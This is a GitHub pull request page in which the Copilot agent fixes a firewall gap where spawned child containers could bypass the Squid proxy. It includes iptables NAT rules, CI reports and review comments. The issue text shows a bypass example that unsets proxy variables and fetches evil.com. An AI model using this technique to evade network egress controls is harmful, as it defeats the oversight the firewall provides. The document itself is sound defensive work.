fix: inject NAT rules into child containers to prevent proxy bypass by Copilot · Pull Request #138 · github/gh-aw-firewall

Copilot · 2025-12-19T08:52:29Z

Child containers spawned by the agent lack NAT rules that redirect HTTP/HTTPS traffic to Squid. Applications ignoring HTTP_PROXY env vars could bypass the firewall entirely.

Changes

docker-wrapper.sh

Inject --cap-add NET_ADMIN into all spawned containers
Wrap user commands with inline iptables NAT setup before exec
Apply NAT injection regardless of whether --network is specified
Use printf %q for robust shell metacharacter escaping
Extract reusable functions (parse_docker_run_args, build_escaped_cmd, etc.)

NAT Setup Script

if command -v iptables >/dev/null 2>&1; then
  iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 172.30.0.10:3128
  iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 172.30.0.10:3128
  # ... DNS and loopback allowances
fi; exec "$@"

Containers without iptables fall back to HTTP_PROXY (previous behavior).

Integration Tests

Verify blocked traffic even with unset HTTP_PROXY
Verify wget --no-proxy blocked by NAT
Verify DNAT rules present in child container
Verify images without iptables still work via proxy env vars

Original prompt

This section details on the original issue you should resolve

<issue_title>[Security] Child containers don't inherit NAT rules - proxy bypass possible</issue_title>
<issue_description>## Priority
P1 - High

Summary

NAT rules that redirect HTTP/HTTPS traffic to Squid only apply to the agent container. When the agent spawns child containers (e.g., for MCP servers), these containers do NOT have the same NAT rules. They rely solely on:

HTTP_PROXY environment variables (can be ignored by applications)

Host iptables default deny (blocks unknown IPs, but doesn't force proxy)

Current Behavior

Agent container has NAT rules:
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 172.30.0.10:3128
iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 172.30.0.10:3128
Spawned child containers do NOT have these rules:
# In agent container (works - NAT redirects to Squid)
curl https://blocked.com  # → Squid → denied

# In spawned container (bypasses NAT if ignores HTTP_PROXY)
docker run alpine curl https://blocked.com  # → May succeed if host iptables allows
Attack Vector
# Spawn container that ignores proxy environment variables
docker run --rm alpine sh -c '
  unset HTTP_PROXY HTTPS_PROXY http_proxy https_proxy
  wget https://evil.com  # No NAT redirect in this container
'
Current Mitigations

docker-wrapper.sh injects --network awf-net and proxy env vars

Host iptables has default deny for non-Squid traffic

Why This is Insufficient

Applications can ignore HTTP_PROXY environment variables

Some tools (e.g., wget --no-proxy) explicitly bypass proxy

Library code may not respect proxy settings

Container may install tools that don't use env vars

Proposed Solutions

Option A: Inject NAT setup into child containers

Modify docker-wrapper.sh to:

Add --cap-add NET_ADMIN to all spawned containers

Inject iptables setup script as entrypoint prefix
# In docker-wrapper.sh
INIT_SCRIPT="iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 172.30.0.10:3128 && \
             iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 172.30.0.10:3128"

DOCKER_ARGS="$DOCKER_ARGS --cap-add NET_ADMIN"
DOCKER_ARGS="$DOCKER_ARGS --entrypoint sh"
# Prepend NAT setup to original entrypoint
Option B: Shared network namespace

Create a network namespace with NAT rules

All child containers share this namespace

NAT rules apply to all traffic in the namespace

Option C: Transparent proxy mode

Configure Squid as a transparent proxy with host-level traffic interception for all containers in awf-net.

Files to Modify

containers/agent/docker-wrapper.sh:82-92 - Network injection logic

src/docker-manager.ts - Container configuration

Potentially: Host-level iptables for transparent proxy

Verification Test
sudo awf --allow-domains github.com -- /bin/bash -c '
  echo "--- Child container NAT rules ---"
  docker run --rm --network awf-net --cap-add NET_ADMIN \
    alpine sh -c "apk add iptables -q && iptables -t nat -L -n 2>/dev/null | grep DNAT || echo 'No NAT rules'"
'
# Expected: "No NAT rules" (current behavior - the gap)
Related

Issue [Security] Docker socket access allows container escape and firewall bypass #10 (Docker socket access)

containers/agent/docker-wrapper.sh - Docker interception</issue_description>

Comments on the Issue (you are @copilot in this section)

Fixes [Security] Child containers don't inherit NAT rules - proxy bypass possible #130

💡 You can make Copilot smarter by setting up custom instructions, customizing its development environment and configuring Model Context Protocol (MCP) servers. Learn more Copilot coding agent tips in the docs.

Co-authored-by: Mossaka <5447827+Mossaka@users.noreply.github.com>

github-actions · 2025-12-19T17:51:50Z

📰 BREAKING: Smoke Copilot is now investigating this pull request. Sources say the story is developing...

github-actions · 2025-12-19T17:51:52Z

💫 TO BE CONTINUED... Smoke Claude failed! Our hero faces unexpected challenges...

github-actions · 2025-12-19T17:54:22Z

Smoke Test Results (Run ID: 20378118736)

Last 2 merged PRs:

docs: streamline README for first-time visitors #111: docs: streamline README for first-time visitors
feat: add install script with sha256 validation #108: feat: add install script with sha256 validation

Tests:

✅ GitHub MCP: Reviewed PRs
✅ File Write: Created /tmp/gh-aw/agent/smoke-test-copilot-20378118736.txt
✅ Bash Tool: Verified file contents

Status: PASS

📰 BREAKING: Report filed by Smoke Copilot fer issue #138 🗺️

github-actions · 2025-12-19T17:55:54Z

Test Coverage Report

Metric	Coverage	Covered/Total
Lines	66.1%	708/1071
Statements	66.27%	729/1100
Functions	70.73%	87/123
Branches	60.89%	232/381

Coverage Thresholds

The project has the following coverage thresholds configured:

Lines: 38%
Statements: 38%
Functions: 35%
Branches: 30%

Coverage report generated by `npm run test:coverage`

Mossaka · 2026-01-06T00:48:39Z

@copilot figure out why https://github.com/githubnext/gh-aw-firewall/actions/runs/20378118743/job/58561726010?pr=138 is failing

Copilot · 2026-01-06T00:50:21Z

@copilot figure out why https://github.com/githubnext/gh-aw-firewall/actions/runs/20378118743/job/58561726010?pr=138 is failing

The CI failure is not related to my PR changes.

The failure is in the "Smoke Claude" workflow where the playwright MCP server failed to launch:

##[error]MCP server(s) failed to launch: playwright

The agent logs show:

[✗] playwright::browser_navigate
[✗] playwright::browser_install
Error: No such tool available: mcp__playwright__browser_navigate

This is an infrastructure/configuration issue with the playwright MCP setup in CI, not related to the NAT rules injection for child containers that I implemented. My changes only affect docker-wrapper.sh and the integration tests for network security.

Copilot

Pull request overview

This PR addresses a security vulnerability where child containers spawned by the agent could bypass proxy-based egress filtering by ignoring HTTP_PROXY environment variables. The fix injects iptables NAT rules directly into child containers to force all HTTP/HTTPS traffic through the Squid proxy, regardless of application proxy settings.

Changes:

Enhanced docker-wrapper.sh to inject NAT rules into child containers using inline iptables setup
Added --cap-add NET_ADMIN to all spawned containers to enable NAT rule configuration
Implemented robust shell argument escaping using printf %q to safely wrap user commands
Added comprehensive integration tests verifying NAT rule injection and proxy bypass prevention

Reviewed changes

Copilot reviewed 2 out of 2 changed files in this pull request and generated 6 comments.

File	Description
containers/agent/docker-wrapper.sh	Implemented NAT rule injection via entrypoint wrapping, argument parsing functions, and shell escaping utilities
tests/integration/docker-egress.test.ts	Added test suite validating NAT rules are applied and prevent proxy bypass even when environment variables are ignored

Comments suppressed due to low confidence (3)

containers/agent/docker-wrapper.sh:112

The special handling of --network and --net options based on the include_network parameter is confusing. When include_network is false, these options are silently dropped from PARSED_DOCKER_OPTS, which could be unexpected behavior. Consider documenting this behavior or refactoring to make the intent clearer.

      if [ "$include_network" = "true" ]; then
        if [ "$arg" = "--network" ] || [ "$arg" = "--net" ]; then
          PARSED_DOCKER_OPTS+=("$arg")
          skip_next=true
          continue
        fi
      fi

containers/agent/docker-wrapper.sh:211

Overriding the entrypoint to sh (line 235, 284) will break containers that rely on specific entrypoints (e.g., containers with initialization scripts, signal handlers, or custom entrypoints). This is a breaking change that could affect existing workflows. Users who explicitly set --entrypoint in their docker run commands will have it silently overridden. Consider detecting existing --entrypoint flags in the arguments and either preserving them with a wrapper or warning the user.

    if [ -z "$PARSED_IMAGE" ]; then

tests/integration/docker-egress.test.ts:400

This test verifies NAT rules are present by checking for 'DNAT' and '172.30.0.10:3128' in iptables output. However, it doesn't verify that the specific HTTP (port 80) and HTTPS (port 443) rules are present, or that the RETURN rules for DNS and localhost are correctly configured. Consider adding more specific assertions to validate the complete NAT rule set.

        `docker run --rm alpine:latest sh -c 'apk add --no-cache iptables >/dev/null 2>&1 && iptables -t nat -L OUTPUT -n 2>/dev/null | grep DNAT || echo "No NAT rules"'`,

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

Copilot · 2026-01-14T18:13:20Z